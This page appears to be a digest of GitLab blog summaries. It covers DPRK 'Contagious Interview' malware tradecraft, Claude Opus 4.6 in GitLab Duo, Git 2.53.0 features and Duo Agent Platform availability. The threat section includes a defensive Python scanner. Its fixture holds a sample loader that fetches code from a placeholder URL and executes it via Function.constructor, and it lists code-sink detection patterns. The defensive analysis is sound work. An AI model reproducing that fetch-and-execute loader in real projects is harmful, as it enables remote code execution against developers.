GitLab / database-design



## GitLab Threat Intelligence Team reveals North Korean tradecraft

The GitLab Threat Intelligence Team has detailed its efforts to disrupt North Korean (DPRK) cyber campaigns, specifically focusing on "Contagious Interview" malware distribution and fraudulent IT worker schemes. By analyzing internal platform data, GitLab identified that these state-sponsored actors leverage legitimate tools and fake recruitment scenarios to compromise software developers and generate illicit revenue for the regime. The report concludes that while these operations are sophisticated and persistent, proactive monitoring and cross-industry intelligence sharing are essential to mitigating these evolving threats.

### Contagious Interview Mechanics

* Threat actors pose as recruiters to trick software developers into executing malicious JavaScript projects under the guise of technical interviews.
* The primary goal is to deploy malware families such as BeaverTail and Ottercookie, which facilitate credential theft and provide remote control of the victim's device.
* A notable evolution in tradecraft includes the use of "ClickFix," a compiled BeaverTail variant identified in late 2025.
* Malicious repositories often use a specific execution pattern where base64-encoded URLs and secret headers are hidden within `.env` files, masquerading as benign configuration variables.
* To execute the payload, actors utilize `Function.constructor` to load strings as executable code, often triggered by custom error handlers designed to source remote content.

### 2025 Campaign Trends and Infrastructure

* GitLab banned 131 unique accounts linked to these campaigns in 2025, with activity peaking in September and averaging 11 bans per month.
* Nearly 90% of malicious accounts were created using Gmail addresses, and actors typically accessed the platform through consumer VPNs or dedicated VPS infrastructure.
* In more than 80% of cases, malware payloads were not stored on GitLab. Instead, actors used concealed loaders to fetch content from legitimate hosting services, most commonly Vercel.
* Recent tactics include the creation of malicious NPM dependencies immediately before use and the exploitation of VS Code tasks to pipe remote content into native shells.

### IT Worker Campaigns and Sanctions Evasion

* Beyond malware distribution, DPRK actors use GitLab to support "IT worker" cells that generate revenue and evade international sanctions.
* One identified pipeline involved the creation of at least 135 synthetic identities, automated to generate professional connections and contact leads at scale.
* Threat actors have been observed adding their own images to stolen U.S. identity documents to bypass employment verification processes.
* Forensic analysis revealed financial records from cell managers detailing revenue proceeds from 2022 through 2025, often earned while operating from locations like Moscow, Russia.

Organizations should remain vigilant against recruitment-themed social engineering and scrutinize unexpected requests to run external code. GitLab recommends that the security community use the provided indicators of compromise to update defensive posture, as these actors continue to refine their ability to hide malicious intent within legitimate development workflows.
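As an added illustration (not code from the GitLab report), the following Python checks a project's `.env` and JavaScript sources for the two loader traits described above: configuration values that are really base64-encoded URLs, and dynamic-code sinks such as `Function.constructor`. The fixtures, the `example.invalid` URL and the sink list are constructed for this example; a reviewer would run the same checks over the files of a repository received from an unknown "recruiter".

```python
import base64
import re

# Constructed fixtures (not from the GitLab report) mimicking the described
# loader: a base64-encoded URL disguised as a setting in .env, and an error
# handler that turns remotely fetched text into code.
HIDDEN_URL = "https://example.invalid/config.js"  # placeholder URL
SAMPLE_ENV = ("DB_HOST=localhost\nAPI_KEY=changeme\nCONFIG_URL="
              + base64.b64encode(HIDDEN_URL.encode()).decode() + "\n")
SAMPLE_JS = (
    'process.on("uncaughtException", () => fetch(process.env.CONFIG_URL)\n'
    '  .then(r => r.text()).then(s => Function.constructor("x", s)));\n'
)

ENV_LINE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*["\']?([^"\'#\n]+)')
B64_VALUE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
JS_SINKS = [  # sinks that turn strings into executable code
    ("Function.constructor", r"Function\.constructor"),
    ("new Function", r"\bnew\s+Function\s*\("),
    ("eval", r"\beval\s*\("),
]

def decode_if_url(value: str):
    """Return the decoded string if value is base64 that decodes to a URL."""
    if not B64_VALUE.match(value):
        return None
    try:
        decoded = base64.b64decode(value + "=" * (-len(value) % 4), validate=True).decode()
    except (ValueError, UnicodeDecodeError):
        return None
    return decoded if decoded.startswith(("http://", "https://")) else None

def scan_env(text: str) -> list:
    """Return (key, decoded_url) pairs for env values hiding base64 URLs."""
    hits = []
    for line in text.splitlines():
        m = ENV_LINE.match(line)
        if m and (url := decode_if_url(m.group(2).strip())):
            hits.append((m.group(1), url))
    return hits

def scan_js(text: str) -> list:
    """Return the names of dynamic-code sinks present in a JS source."""
    return [name for name, pat in JS_SINKS if re.search(pat, text)]

def triage(env_text: str, js_text: str) -> str:
    """Encoded URL plus a code sink in the same project is the high-risk case."""
    signals = bool(scan_env(env_text)) + bool(scan_js(js_text))
    return ("none", "medium", "high")[signals]
```

Ordinary secrets that happen to be long alphanumeric strings are not flagged, because only values that decode to a `http(s)://` URL count as a hit.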


## Claude Opus 4.6 now available in GitLab Duo Agent Platform

GitLab has integrated Anthropic’s Claude Opus 4.6 into its Duo Agent Platform, providing developers with a high-intelligence frontier model designed for complex agentic workflows. By combining a 1-million-token context window with native access to DevSecOps data, the update enables more autonomous task execution and deeper reasoning within the software development lifecycle. This integration allows teams to delegate multi-step tasks to AI agents that can now process entire codebases and project histories in a single interaction.

### Advanced Agentic Capabilities and Reasoning

* Claude Opus 4.6 features enhanced "agentic" behavior, meaning it can proactively take actions and drive tasks forward with minimal human intervention.
* The model supports multi-agent orchestration, allowing it to spin up subagents and coordinate parallel workstreams to solve complex, multi-step problems.
* Adaptive thinking capabilities allow the model to calibrate its reasoning depth based on the query, using extended thinking for difficult tasks while maintaining speed for simpler ones.
* Deep reasoning via test-time compute helps the model navigate challenging development bottlenecks and architectural decisions.

### Full-Context DevSecOps Integration

* The model boasts a 1-million-token context window, a fivefold increase over Opus 4.5, enabling the processing of massive codebases and extensive documentation.
* Integration with the GitLab Duo Agent Platform provides the model with direct access to repositories, merge requests, pipelines, and security findings.
* Enterprise-grade security features, including human-in-the-loop controls and group-based access, ensure that agentic actions remain transparent and governed.
* Native integration ensures developers can utilize these frontier capabilities without leaving their established GitLab workflows.

### Availability and Resource Consumption

* Opus 4.6 is currently available for GitLab.com users via the Duo Agent Platform and Agentic Chat, though it is not supported for GitLab Duo Classic features.
* Support for the model within various Integrated Development Environments (IDEs) is expected to be released in the near future.
* Usage is managed via GitLab credits, with multipliers determined by the size of the prompt.
* Prompts containing 200k tokens or fewer are charged at 1.2 requests per credit, while larger prompts exceeding 200k tokens are charged at 0.7 requests per credit.

Organizations aiming to automate complex development workstreams should migrate their specialized agents to Claude Opus 4.6 to take advantage of its superior orchestration and context handling. By leveraging the model's ability to coordinate parallel subagents, teams can significantly reduce the manual effort required for codebase-wide refactors and security remediation.


## What’s new in Git 2.53.0?

Git 2.53.0 introduces significant performance and maintenance improvements, specifically targeting large repositories and complex history rewriting workflows. Key updates include compatibility between geometric repacking and partial clones, as well as more granular control over commit signatures during imports. These enhancements collectively move Git toward more efficient repository management and better data integrity for modern development environments.

### Geometric Repacking Support with Promisor Remotes

* Git utilizes repacking to consolidate loose objects into packfiles, with the "geometric" strategy maintaining a size-based progression to minimize the computational overhead found in "all-into-one" repacks.
* Previously, geometric repacking was incompatible with partial clones because it could not correctly identify or manage "promisor" packfiles, which contain the metadata for objects expected to be backfilled from a remote.
* The 2.53.0 release enables geometric repacking to process promisor packfiles separately, preserving the promisor marker and preventing the tool from crashing when used within a partial clone repository.
* This fix removes a major blocker for making the geometric strategy the default repacking method for all Git repositories.

### Preserving Valid Signatures in git-fast-import(1)

* The `git-fast-import` tool, a backend for high-volume data ingestion and history rewriting, previously lacked the nuance to handle commit signatures during partial repository edits.
* A new `strip-if-invalid` mode has been added to the `--signed-commits` option to solve the "all-or-nothing" problem where users had to choose between keeping broken signatures or stripping valid ones.
* This feature allows Git to automatically detect which signatures remain valid after a rewrite and only strip those that no longer match their modified commits.
* This provides a foundation for tools like `git-filter-repo` to preserve the chain of trust for unchanged commits during migration or cleaning operations.

### Expanded Data in git-repo-structure

* The `structure` subcommand of `git-repo`, intended as a native alternative to the `git-sizer` utility, now provides deeper insights into repository scaling.
* The command now reports the total inflated size and actual disk size of all reachable objects, categorized by type: commits, trees, blobs, and tags.
* These metrics are essential for administrators managing massive repositories, as they help identify which object types are driving disk consumption and impacting performance.

These updates reflect Git’s continued focus on scalability and developer experience, particularly for organizations managing massive codebases. Users of partial clones and repository migration tools should consider upgrading to 2.53.0 to leverage the improved repacking logic and more sophisticated signature handling.


## Announcing general availability for GitLab Duo Agent Platform

The GitLab Duo Agent Platform has reached general availability, marking a shift from basic AI code assistance to comprehensive agentic automation across the entire software development lifecycle. By orchestrating intelligent agents to handle complex tasks like security analysis and planning, the platform aims to resolve the "AI paradox" where faster code generation often creates downstream bottlenecks in review and deployment.

### Usage-Based Economy via GitLab Credits

* GitLab is introducing "GitLab Credits," a virtual currency used to power the platform’s usage-based AI features.
* Premium and Ultimate subscribers receive monthly credits ($12 and $24 respectively) at no additional cost to facilitate immediate adoption.
* Organizations can manage a shared pool of credits or opt for on-demand monthly billing, with existing Duo Enterprise contracts eligible for conversion into credits.

### Agentic Chat and Contextual Orchestration

* The Duo Agentic Chat provides a unified experience across the GitLab Web UI and various IDEs, including VS Code, JetBrains, Cursor, and Windsurf.
* The chat utilizes multi-step reasoning to perform actions autonomously, drawing from the context of issues, merge requests, pipelines, and security findings.
* Capabilities extend beyond code generation to include infrastructure-as-code (IaC) creation, pipeline troubleshooting, and explaining vulnerability reachability.

### Specialized Foundational and Custom Agents

* **Foundational Agents:** Pre-built specialists designed for specific roles, such as the Planner Agent for breaking down work and the Security Analyst Agent for triaging vulnerabilities.
* **Custom Agents:** Developed through a central AI Catalog, these allow teams to build and share agents that adhere to organization-specific engineering standards and guardrails.
* **External Agents:** Native integration of third-party AI tools, such as Anthropic’s Claude Code and OpenAI’s Codex CLI, provides access to external LLM capabilities within the governed GitLab environment.

### Automated End-to-End Flows

* The platform introduces "Flows," which are multi-step agentic sequences designed to automate repeatable transitions in the development cycle.
* The "Issue to Merge Request" flow builds structured code changes directly from defined requirements to jumpstart development.
* Specialized CI/CD flows help teams modernize pipeline configurations and automatically analyze and suggest fixes for failed pipeline runs.
* The Code Review flow streamlines the feedback loop by providing AI-native analysis of merge request comments and code changes.

To maximize the impact of agentic AI, organizations should move beyond basic chat interactions and begin integrating these specialized agents into their broader orchestration workflows to eliminate manual handoffs between planning, coding, and security.